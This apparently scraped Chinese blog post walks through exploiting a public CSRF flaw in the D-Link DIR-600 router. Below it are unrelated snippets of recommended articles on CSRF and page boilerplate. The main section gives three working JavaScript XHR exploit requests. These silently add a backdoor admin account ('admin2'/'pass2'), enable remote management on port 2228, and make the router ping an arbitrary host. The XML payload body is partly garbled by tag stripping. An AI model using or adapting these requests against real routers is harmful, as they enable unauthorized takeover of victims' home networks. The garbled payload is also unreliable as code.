html中csrf漏洞代码,使用CSRF漏洞攻击D-link路由器全过程

最新推荐文章于 2024-05-22 22:09:28 发布
最新推荐文章于 2024-05-22 22:09:28 发布
阅读量311 收藏
点赞数 1
文章标签: html中csrf漏洞代码

1,介绍

本文的目的是展示CSRF漏洞的危害,以D-link的DIR-600路由器(硬件版本:BX,固件版本:2.16)的CSRF漏洞为例。

D-link的CSRF漏洞已经是公开的,本文将详细描述一下整个D-link CSRF漏洞的利用,如何通过CSRF漏洞实现远程管理访问D-link路由器。

2,CSRF漏洞说明

如果某些request请求中没有csrf  token或不需要密码授权,会存在CSRF漏洞,该漏洞允许攻击者伪造登录用户发送请求,因此可以导致用户执行攻击者想要的操作请求。

通过D-link 管理面板的CSRF漏洞,攻击者可以做以下操作:

@1,添加一个新的管理帐号;

@2,启用路由器的远程管理;

@3,ping特定的机器;此操作只需要登录路由器就可以实现,需要知道路由器的WAN IP地址。

3,PART1:给路由器增加一个新的管理帐号

需要两个request请求来完成

REQUEST1:

复制代码代码如下:

function submitRequest()

{

var xhr = new XMLHttpRequest();

xhr.open("POST", "http://192.168.0.1/hedwig.cgi", true);

xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");

xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");

xhr.setRequestHeader("Content-Type", "text/plain; charset=UTF-8");

xhr.withCredentials = "true";

var body = "<?xml version=\"1.0\" encoding=\"UTF-8\" ?>"+

"

"+

""+

"DEVICE.ACCOUNT"+

""+

""+

""+

"1"+

"2"+

""+

"admin"+

"

==OoXxGgYy=="+

"0"+

""+

""+

""+

"admin2"+

"

pass2"+

"0"+

""+

""+

""+

""+

"0"+

""+

"180"+

"128"+

"16"+

""+

""+

""+

""+

"HTTP.WAN-1"+

""+

"2228"+

""+

""+

""+

""+

""+

""+

"HTTP.WAN-2"+

""+

"2228"+

""+

""+

""+

""+

""+

"";

xhr.send(body);

}

REQUEST2:

复制代码代码如下:

function submitRequest()

{

var xhr = new XMLHttpRequest();

xhr.open("POST", "http://192.168.0.1/pigwidgeon.cgi", true);

xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");

xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");

xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");

xhr.withCredentials = "true";

var body = "ACTIONS=SETCFG%2CSAVE%2CACTIVATE";

xhr.send(body);

}

REQUEST1和REQUEST2中,默认的路由局域网IP地址是192.198.0.1,管理帐号是admin,REQUEST1中的request请求中,当密码字段为==OoXxGgYy==的时候,是不会修改admin帐号的密码的。这两个请求完成了管理帐号admin2的添加,同时启用了远程管理端口2228.

PART2:ping特定的主机

REQUEST3:

复制代码代码如下:

function submitRequest()

{

var xhr = new XMLHttpRequest();

xhr.open("POST", "http://192.168.0.1/diagnostic.php", true);

xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");

xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");

xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");

xhr.withCredentials = "true";

var body = "act=ping&dst=X.Y.Z.W";

xhr.send(body);

}

只需要求该代码中的X.Y.Z.W为你需要ping的主机IP地址就可以。

李阁雅
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
csrf漏洞例子(html、css、JavaScript、php)
04-26
demo例子操作步骤 1、登录获取身份认证(这里用到session) 2、登录后点击跳转进入有漏洞的网站(这里模拟的是黑客发给受害者的地址) 3、点击跳转后是一个图片 注解:其src的地址money.php是网站的转账接口 其name是转给谁,money是转多少钱 一旦目标登录了网站访问了这个网页,就会利用session给jake转账100元 可以在目录下查看journal.txt查看转账日志//每刷新一次页面就会转一次账
55-55.渗透测试-CSRF漏洞防御.mp4
05-10
55-55.渗透测试-CSRF漏洞防御.mp4
web网站安全 CSRF介绍及解决方案
半夏_2021的博客
04-26 1977
CSRF 英文全称是 Cross-site request forgery,所以又称为“跨站请求伪造”。 是指恶意网站通过脚本向当前用户浏览器打开的其它页面的 URL 发起恶意请求,由于同一浏览器进程下 Cookie 可见性,导致用户身份被盗用,完成恶意网站脚本指定的操作。简单来讲,CSRF 攻击就是黑客利用了用户的登录状态,并通过第三方的站点来做一些坏事。
CSRF 攻击详解
只为成功找方法 不为失败找借口
05-22 1029
禁用 CSRF 保护有其合理的应用场景,特别是在开发 RESTful API、使用其他防护措施、内部应用和非浏览器客户端时。然而,需要谨慎对待这个决定,并确保在适当的场景启用 CSRF 保护,以防范潜在的安全风险。
htmlcsrf漏洞代码,MVC Html.AntiForgeryToken() 防止CSRF攻击
weixin_39552037的博客
06-10 188
MVCHtml.AntiForgeryToken()是用来防止跨站请求伪造(CSRF:Cross-site request forgery)攻击的一个措施,它跟XSS(XSS又叫CSS:Cross-Site-Script),攻击不同,XSS一般是利用站内信任的用户在网站内插入恶意的脚本代码进行攻击,而CSRF则是伪造成受信任用户对网站进行攻击。举个简单例子,譬如整个系统的公告在网站首页显示,而...
Html可能存在的漏洞
永不垂头的博客
07-23 2045
学习笔记—Html可能存在的漏洞 Html可能存在的漏洞 HTML称为超文本标记语言,是一种标识性的语言。它包括一系列标签.通过这些标签可以将网络上的文档格式统一,使分散的Internet资源连接为一个逻辑整体。HTML文本是由HTML命令组成的描述性文本,HTML命令可以说明文字,图形、动画、声音、表格、链接等。 <p></p>段落 <div></div>块 基础、网页必备 纯的html 基本上是不会有漏洞 点击劫持 ```javascript ```
htmlcsrf漏洞代码, 看图说话:跨站伪造请求(CSRF漏洞示例
weixin_36480122的博客
06-09 603
1、CSRF(Cross-site request forgery)跨站请求伪造,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用,可以在受害者毫不知情的情况下以受害者名义伪造请求发送给受攻击站点(信任站点A)。尽管听起来像跨站脚本(XSS);2、与网站脚本(XSS)相比:--XSS 利用的是用户对指定网站的信任,CSRF 利用的是网站对用户网页浏览器的信任。--CSRF攻击在近年逐渐流行和...
hucart-含有CSRF漏洞的源码.zip
12-31
在这个案例,"hucart-含有CSRF漏洞的源码.zip" 提供了一个实际的示例,让我们深入探讨一下CSRF漏洞的原理、危害以及防范措施。 1. **CSRF漏洞原理**: CSRF漏洞通常发生在Web应用程序,这些应用未对请求进行...
54-54.渗透测试-CSRF漏洞挖掘.mp4
05-10
54-54.渗透测试-CSRF漏洞挖掘.mp4
CSRF漏洞防御-01
09-15
CSRF漏洞防御是一种非常重要的安全机制,它可以防止恶意攻击者对Web应用程序的攻击CSRF漏洞防御主要包括四种方法:验证码防御、Referer Check防御、Anti CSRF Token防御和Token泄露。 验证码防御 验证码防御是一...
CSRF漏洞token防御介绍-01
09-15
CSRF 漏洞 Token 防御介绍 CSRF(Cross-Site Request Forgery,跨站请求伪造)是一...在本课程,我们将详细介绍 Token 防御的逻辑和实现方式,了解如何使用 Token 防御 CSRF 漏洞,并提供一些实际应用的示例代码
干货!!学习 CSRF 跨站请求伪造,看这一篇就够了
喜欢Python编程的程序员柚柚呀
06-21 647
才行。其实很简单,比如我们使用 QQ,看看 QQ zone,突然蹦出个包含奖或者问卷调查链接的聊天窗口(或者是。。。),这个腾讯做了防范,但是我们收到封邮件包含此内容,很多用户会选择去点击在网上找了张图片很能说明这个过程。
HTML5特性与漏洞
zuoyidaren的博客
12-02 386
1.什么是 HTML5? HTML5 将成为 HTML、XHTML 以及 HTML DOM 的新标准。 HTML 的上一个版本诞生于 1999 年。自从那以后,Web 世界已经经历了巨变。 HTML5 仍处于完善之。然而,大部分现代浏览器已经具备了某些 HTML5 支持。 为 HTML5 建立的一些规则: 新特性应该基于 HTML、CSS、DOM 以及 JavaScr...
HTML form without CSRF protection,HTML表单没有CSRF保护
fujianmin19910915的博客
05-26 4488
HTML form without CSRF protection =HTML表单没有CSRF保护 CSRF是伪造客户端请求的一种攻击CSRF的英文全称是Cross Site Request Forgery,字面上的意思是跨站点伪造请求。这种攻击方式是国外的安全人员于2000年提出,国内直到06年初才被关注,早期我们使用CSRF攻击实现了DVBBS后台的SQL注射,同时网上也出现过动易后台管理员添加的CSRF漏洞等,08年CSRF攻击方式开始在BLOG、SNS等大型社区类网站的脚本蠕虫使用。 CS..
CSRF攻击与防御(写得非常好)
墨鱼菜鸡
07-11 363
From:https://www.daguanren.cc/post/csrf-introduction.html From:https://blog.csdn.net/stpeace/article/details/53512283 CSRF 攻击的应对之道:https://www.ibm.com/developerworks/cn/web/1102_...
CSRF攻击的危害分析
stormjun的博客
07-13 535
跨站请求伪造(Cross-Site Request Forgery,简称 CSRF)是一种常见的网络攻击攻击者通过伪造用户请求,将恶意请求发送到目标网站,从而实现攻击目的。CSRF攻击可以造成严重的危害,本文将从多个方面分析CSRF攻击的危害,并探讨防范CSRF攻击的措施。
html5 csrf,在HTML文件的表单添加{%csrf_token%}便可以解决问题
weixin_36382073的博客
07-02 387
HTML文件的表单添加{%csrf_token%}便可以解决问题原因是django为了在用户提交表单时防止跨站攻击所做的保护只需在html文件的表单添加{%csrf_token%}便可以解决问题------------------------if判断{% if %}标签计算一个变量值,如果是“true”,即它存在、不为空并且不是false的boolean值,系统则会显示{% if %}和{%...
CSRF攻击
m0_53387706的博客
10-31 210
csrf攻击及预防
常见web漏洞及防范(转)
热门推荐
hackerie的博客
01-22 1万+
单个漏洞,需要进行排查与整改,借着别人的智慧,做一个简单的收集。最好能够将常见漏洞,不限于web类的,进行一个统一的整理。这是今年的任务。 进行漏洞的工具的收集,为未来的工作做好基础。。。 一、SQL注入漏洞 SQL注入攻击(SQL Injection),简称注入攻击、SQL注入,被广泛用于非法获取网站控制权,是发生在应用程序的数据库层上的安全漏洞。在设计程序,忽略了对输入字符串夹带的S...
csrf漏洞攻击工具
最新发布
07-10
CSRF (Cross-Site Request Forgery) 漏洞是一种常见的网络攻击手段,攻击者会利用用户已经登录的网站身份,发送恶意请求到受害者不知情的情况下。这种攻击通常通过构造特殊的链接或表单数据,诱使用户的浏览器执行非...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值